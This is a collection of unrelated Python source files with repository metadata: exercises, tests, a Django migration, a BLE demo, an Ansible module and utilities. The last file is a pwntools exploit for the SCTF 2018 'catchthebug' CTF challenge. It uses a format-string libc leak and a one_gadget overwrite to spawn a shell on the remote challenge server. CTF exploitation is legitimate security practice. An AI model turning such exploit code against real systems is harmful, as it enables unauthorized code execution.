quit()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
35da38996a54cfbccf733b5859960068514b4714
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2332/60592/271480.py
|
f602a8c01f31dbba291aa53971306002fff48fef
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 630 |
py
|
base = int(input())
tar = int(input())
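# A hedged reading of the two passes below: greedily decompose `tar` into
# powers of `base`, accumulating an operator count `te` per power used. The
# first pass only subtracts powers <= the remainder; the second pass may
# overshoot with the next larger power and continue from a negative
# remainder. The printed answer is the smaller count of the two passes.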
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
    mark //= base  # integer division keeps the remainder an int
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun))
|
[
"[email protected]"
] | |
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0
|
f63907d2115becd64704ef1881f3bfcb7ba9047d
|
/sandbox/test/testTemplate.py
|
91ba4b483092ee7a004dca1be860007bfd13cdaa
|
[] |
no_license
|
AseiSugiyama/NZMATH-Python3
|
d456610f72071a654531583228e439ffa8a4db0c
|
f65b176be2e58fafa0eea91f399c9ab17f3f478b
|
refs/heads/master
| 2020-05-21T07:26:51.434191 | 2019-04-27T09:52:18 | 2019-04-27T09:52:18 | 185,959,644 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 989 |
py
|
import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
Test classes must inherite unittest.TestCase.
They have name suffixed with 'Test'.
"""
def setUp(self):
"""
setUp is run before each test method run.
"""
pass
def tearDown(self):
"""
tearDown is run after each test method run.
"""
pass
def testHuga(self):
"""
        Every test method has a name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"devnull@localhost"
] |
devnull@localhost
|
2b900473f8ebad3774236008a4ce12609bd077c4
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/validation/tests/test_validation.py
|
c1128b9d609b6db323abf0d49d809d2207be7177
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,060 |
py
|
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://[email protected]:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('[email protected]'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:[email protected]'), 1)
self.failIfEqual(v('[email protected]'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
|
[
"[email protected]"
] | |
edd7334352747e1e9b08be0af986b1239e3ee6fe
|
5a25edcf994a760688dc7c933e8071bf4ff24df3
|
/exercises/ja/solution_01_08_01.py
|
01762ddd77ee431a33af88413c4449ddfc5b02bc
|
[
"CC-BY-NC-4.0",
"MIT"
] |
permissive
|
heyMP/spacy-course
|
8762990ed6179011680730d9c24d5d34c0a8d954
|
3740c717f0d1090b01c1b0fe23f8e30af3bf0101
|
refs/heads/master
| 2022-11-07T21:52:15.479840 | 2020-06-25T18:13:44 | 2020-06-25T18:13:44 | 275,202,487 | 1 | 0 |
MIT
| 2020-06-26T16:39:32 | 2020-06-26T16:39:31 | null |
UTF-8
|
Python
| false | false | 476 |
py
|
import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# Process the text
doc = nlp(text)
for token in doc:
    # Get the token text, part-of-speech tag, and dependency label
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
    # Format and print
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
[
"[email protected]"
] | |
2f7b555b8a023acfc59b3616b78949d6bc53ab5f
|
3349a0d44da04fd9fae7728ce1315ccf0c82285e
|
/556A - case of zeroes and ones.py
|
c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb
|
[] |
no_license
|
umairnsr87/Data_Structures_Python
|
959848e546fd4f98959bc14470c26ce91bfb5c9c
|
05b5803521ed2ec7f64d95f08e2f014471dfdfd4
|
refs/heads/master
| 2023-07-18T12:11:55.245699 | 2023-07-16T17:01:09 | 2023-07-16T17:01:09 | 294,360,086 | 0 | 0 | null | 2023-07-16T17:01:10 | 2020-09-10T09:11:11 |
Python
|
UTF-8
|
Python
| false | false | 567 |
py
|
from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' in strings or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
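# Each removal of '01' or '10' deletes exactly one '0' and one '1', so
# min(count('0'), count('1')) pairs can be removed and len - 2*min remains.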
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
|
[
"[email protected]"
] | |
e607164ee72ed5d0071b455388700dbe366a225e
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_windlasses.py
|
6ee113296ad40900fcef0fed2db7fb643eaa9caf
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
#class header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
		self.definitions = "windlass"
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
|
[
"[email protected]"
] | |
8c8e0126b4969636ebe2d414567e598beb70bf2c
|
e9a9955da9bee9be6580f1b1a75f97a1f99d0289
|
/login/migrations/0016_auto_20190803_1452.py
|
eb4f2ea18f1fff82b8ba290db60a29457a52f715
|
[] |
no_license
|
Manjunatha1997/project_IT
|
bdb36142256b9d4eb1b75a76994d801dd3c33013
|
fe58a30d033d4f4ed818c0282a802fafcf3aaff5
|
refs/heads/master
| 2021-02-28T04:17:13.872903 | 2020-03-07T15:48:49 | 2020-03-07T15:48:49 | 245,661,299 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 637 |
py
|
# Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
|
[
"[email protected]"
] | |
f17669184ef2e9e58cc9613ffd6e8add89126ea3
|
09e8c92187ff8d7a726727041e2dd80850dcce3d
|
/leetcode/028_implement_strStr_TRICKY.py
|
7154dcc9281455ccd29a545cb11042da6c8c43ad
|
[] |
no_license
|
kakru/puzzles
|
6dd72bd0585f526e75d026f3ba2446b0c14f60e0
|
b91bdf0e68605f7e517446f8a00b1e0f1897c24d
|
refs/heads/master
| 2020-04-09T09:47:31.341475 | 2019-05-03T21:24:41 | 2019-05-03T21:24:41 | 160,246,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,846 |
py
|
#/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a pitfall in the step-by-step solution that is easy to forget:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
ea641622136b336a1f7196b18e51f101df6df097
|
d45bb44b0dfabfeff37c21a6ac0be1362782e39a
|
/utils/import_bookmarks.py
|
ea763b006243bdea76577f71ce07e8fba1168997
|
[] |
no_license
|
SyJarvis/BookmarkManager
|
c25f9df8cb0d0719de805f8080a7ae78c5ac529c
|
dc3baf06fd47c4514b148134ee3d3fa03f7f1571
|
refs/heads/master
| 2023-03-26T17:14:17.776441 | 2021-03-21T14:58:58 | 2021-03-21T14:58:58 | 322,634,112 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 647 |
py
|
from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
        with open(filename, 'r', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
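# Illustrative usage (the filename is an assumption):
#   bm = BookmarksTodb('bookmarks.html')
#   folders = bm.get_cage_list()   # <H3> folder names
#   links = bm.get_url_list()      # [{'url': ..., 'title': ...}, ...]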
|
[
"[email protected]"
] | |
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e
|
a09e70355b756bd5cba55246e17eb0480af6257b
|
/examples/ble_demo_central.py
|
eb56a9cb9b54270e50eb0709aed3104e43dfecc4
|
[
"MIT"
] |
permissive
|
devoh747/Adafruit_CircuitPython_BLE
|
9735381dc3481661af54ac32d89ec40e006edc5b
|
7566483e2dbdb1bf6c71d5629a2ed37b113c7cff
|
refs/heads/master
| 2020-08-09T04:14:59.774817 | 2019-10-10T21:11:07 | 2019-10-10T21:11:07 | 213,995,226 | 0 | 0 |
MIT
| 2019-10-09T18:33:32 | 2019-10-09T18:33:32 | null |
UTF-8
|
Python
| false | false | 1,319 |
py
|
"""
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
|
[
"[email protected]"
] | |
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/103. 二叉树的锯齿形层次遍历.py
|
b3b9739640c5bbaeecf8e7c3f913e970275761a9
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 818 |
py
|
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
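        # Plain BFS level order; reverse the collected values on every
        # second level to produce the zigzag ordering.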
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
|
[
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb
|
84290c584128de3e872e66dc99b5b407a7a4612f
|
/Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py
|
c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b
|
[] |
no_license
|
BautizarCodigo/DataAnalyticEssentials
|
91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789
|
7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57
|
refs/heads/main
| 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 504 |
py
|
# Import scale
from sklearn.preprocessing import scale
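# Note: this is an exercise snippet -- numpy (as np) and the feature matrix X
# are assumed to be preloaded by the environment. scale() standardizes each
# feature to mean 0 and standard deviation 1, which the printouts confirm.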
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled)))
|
[
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d
|
b47f2e3f3298388b1bcab3213bef42682985135e
|
/experiments/fdtd-2d/tmp_files/2238.py
|
6dfcdd1cd9629a3c959c2e3b61310de6617d05bf
|
[
"BSD-2-Clause"
] |
permissive
|
LoopTilingBenchmark/benchmark
|
29cc9f845d323431e3d40e878cbfc6d1aad1f260
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
refs/heads/master
| 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 411 |
py
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
|
[
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_combos.py
|
cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 231 |
py
|
from xai.brain.wordbase.nouns._combo import _COMBO
#class header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
|
[
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/619.py
|
85060cf54efea0ef148ad0160403ca71cbb9b978
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
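# Precompute every "fair" square up to (10**7)**2: i palindromic and i*i
# palindromic; each query then only counts how many fall in [min_val, max_val].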
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
|
[
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce
|
a867b1c9da10a93136550c767c45e0d8c98f5675
|
/G_LC_1055_ShortestWaytoFormString.py
|
057fd0b488c0696e709603ccc3d5993c1b5d2c98
|
[] |
no_license
|
Omkar02/FAANG
|
f747aacc938bf747129b8ff35b6648fb265d95b6
|
ee9b245aa83ea58aa67954ab96442561dbe68d06
|
refs/heads/master
| 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 835 |
py
|
# import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
|
[
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/template_project.py
|
432a757ecb62ba97acf49d326d6c97cb68fe269b
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,792 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
|
[
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1
|
0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b
|
/sctf/2018/catchthebug/exploit.py
|
10ff19c7084f606481adcd2e34de7136bf30a20a
|
[] |
no_license
|
hnoson/writeups
|
359a33b03286bab19359ad9b089e6f3bfe4fb708
|
05550e3c462108f6c5ba0b69f65694e2eb1dc9b3
|
refs/heads/master
| 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,927 |
py
|
#!/usr/bin/env python
from pwn import *
def catch(name):
while True:
s.sendlineafter('>> ', '1')
s.recvline()
if s.recvline(False) == 'There is no bug =(':
continue
s.sendafter('>> ', name)
break
def inspect(num):
s.sendlineafter('>> ', '2')
ret = []
for i in range(num):
s.recvuntil('==\n')
ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
s.sendlineafter('>> ', '3')
s.sendafter('title\n', title)
s.sendafter('subtitle\n', subtitle)
if len(body) < 0x100:
body += '\n'
s.sendafter('body\n', body)
if len(tag) < 8:
tag += '\n'
s.sendafter('tag\n', tag)
s.sendafter('password\n', password)
if __name__ == '__main__':
# context.log_level = 'DEBUG'
if len(sys.argv) == 1:
s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
# s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
else:
s = remote('catchthebug.eatpwnnosleep.com', 55555)
libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
catch('%p\n')
catch('AAAA')
catch('AAAA')
res = inspect(3)
libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
log.info('libc base: %#x' % libc_base)
length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
log.info('report length: %#x' % length)
if length < 0x618:
print 'try again'
exit(0)
body = 'A' * (0x708 - length)
body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
tag = p64(libc_base + one_gadgets[2])
submit(body = body, tag = tag)
s.interactive()
|
[
"[email protected]"
] | |
